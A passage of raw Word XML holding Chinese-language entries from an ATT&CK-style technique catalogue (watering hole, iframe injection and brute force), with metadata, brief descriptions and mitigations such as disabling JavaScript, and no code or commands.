        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>水坑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D927B2" w14:paraId="59BA204D" w14:textId="77777777" w:rsidTr="00D927B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF98E07" w14:textId="7A73B41D" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1216</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F55CE60" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FCA4BC0" w14:textId="77777777" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC90136" w14:textId="77777777" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA64BE2" w14:textId="76351B13" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="445EEA5A" w14:textId="77777777" w:rsidR="00D927B2" w:rsidRPr="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4257088D" w14:textId="6F9F141C" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>水坑攻击是一种安全漏洞，攻击者试图通过感染该组成员已知访问的网站来破坏特定的最终用户群。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标是感染目标用户的计算机并获得目标工作地点的网络访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D37061" w14:textId="7E8B1CF7" w:rsidR="00D927B2" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D927B2" w:rsidRPr="005C4554" w14:paraId="6084AEF1" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1019928A" w14:textId="77777777" w:rsidR="00D927B2" w:rsidRPr="005C4554" w:rsidRDefault="00D927B2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="40177F8A" w14:textId="77777777" w:rsidR="00D927B2" w:rsidRPr="005C4554" w:rsidRDefault="00D927B2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D927B2" w:rsidRPr="003A640F" w14:paraId="245EB536" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D383D46" w14:textId="7D2C7786" w:rsidR="00D927B2" w:rsidRPr="003A640F" w:rsidRDefault="00D927B2" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>高安全级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51938B95" w14:textId="2DF25CB2" w:rsidR="00D927B2" w:rsidRPr="003A640F" w:rsidRDefault="00D927B2" w:rsidP="00D927B2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以使用更高的安全级别。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>javascript</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E7CEFCE" w14:textId="2A1C8CC6" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00214C58" w14:paraId="055C7EFB" w14:textId="77777777" w:rsidTr="00214C58">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F8D03D7" w14:textId="6E8DB20E" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>1217</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09DAF3EC" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD94485" w14:textId="77777777" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D266DFF" w14:textId="77777777" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A68C2C" w14:textId="165694A6" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="245153AF" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EB9233" w14:textId="77777777" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者将恶意代码嵌入到用户访问的网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，该网站会感染连接到它的计算机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127337B" w14:textId="03E4747B" w:rsidR="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00214C58" w:rsidRPr="005C4554" w14:paraId="0D77EA13" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0235F1EF" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="005C4554" w:rsidRDefault="00214C58" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6A8F1079" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="005C4554" w:rsidRDefault="00214C58" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00214C58" w:rsidRPr="003A640F" w14:paraId="2CBF24F0" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C5B8589" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="003A640F" w:rsidRDefault="00214C58" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>高安全级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E1EC02B" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="003A640F" w:rsidRDefault="00214C58" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以使用更高的安全级别。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>javascript</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B65247F" w14:textId="77777777" w:rsidR="00214C58" w:rsidRPr="00214C58" w:rsidRDefault="00214C58" w:rsidP="00214C58">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A4E0B0" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="0096095B" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="007029CC" w14:paraId="03480CF9" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="544CB4D3" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1110</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC1EA48" w14:textId="3B966AC6" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初始访问</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334587A7" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D71CDB0" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EC9F5E" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证</w:t>
            </w:r>
            <w:r>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAACF76" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r>
              <w:t>John Strand</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r>
              <w:t>Ed Williams</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>Trustwave</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:t>SpiderLabs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE5B471" w14:textId="77777777" w:rsidR="007029CC" w:rsidRPr="003446E4" w:rsidRDefault="007029CC" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E266F97" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2393EA79" w14:textId="77777777" w:rsidR="007029CC" w:rsidRDefault="007029CC" w:rsidP="007029CC">
      <w:r>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>想</w:t>
      </w:r>
      <w:r>
        <w:t>访问某账号但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道</w:t>
      </w:r>
      <w:r>
        <w:t>账号密码或仅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>了账号的密码哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术尝试访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96DCAD" w14:textId="6B2C88B6" w:rsidR="007029CC" w:rsidRDefault="006508E9" w:rsidP="007029CC">
      <w:r>
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidR="007029CC" w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于获取密码哈希</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>ass the Hash</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法行不通时</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>，攻击者</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>可能会用</w:t>
      </w:r>
      <w:r>
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>的方法来获取密码哈希。</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="007029CC">
        <w:t>可以使用相应技术来系统地猜测用于计算哈希的密码</w:t>
      </w:r>
      <w:r w:rsidR="007029CC" w:rsidRPr="00C14136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
